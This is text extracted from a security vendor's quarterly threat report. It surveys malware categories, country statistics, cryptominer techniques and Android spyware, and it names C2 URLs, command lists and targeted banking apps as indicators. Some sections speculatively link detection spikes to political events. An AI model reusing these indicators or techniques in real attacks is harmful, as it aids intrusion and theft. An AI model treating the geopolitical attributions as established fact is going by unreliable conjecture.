523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
